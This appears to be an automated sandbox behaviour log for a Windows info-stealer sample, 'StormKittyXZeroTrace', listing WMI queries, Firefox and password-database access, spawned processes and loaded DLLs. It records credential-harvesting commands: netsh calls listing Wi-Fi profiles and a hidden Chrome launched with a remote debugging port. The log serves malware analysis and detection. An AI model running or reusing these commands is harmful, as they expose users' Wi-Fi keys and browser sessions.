Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\installs.ini

Jump to behavior

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome.exe, 0000000A.00000002.1073482252.000016F4008D8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009D08000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009B3A000.00000004.00000800.00020000.00000000.sdmp, tmpB2E2.tmp.dat.0.dr, tmp4E5D.tmp.dat.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: StormKittyXZeroTrace.exe.bin.exe	Virustotal: Detection: 61%
Source: StormKittyXZeroTrace.exe.bin.exe	ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe "C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe"
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,4059793281164060634,11983181844265787812,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2168 /prefetch:3
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,4059793281164060634,11983181844265787812,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2168 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
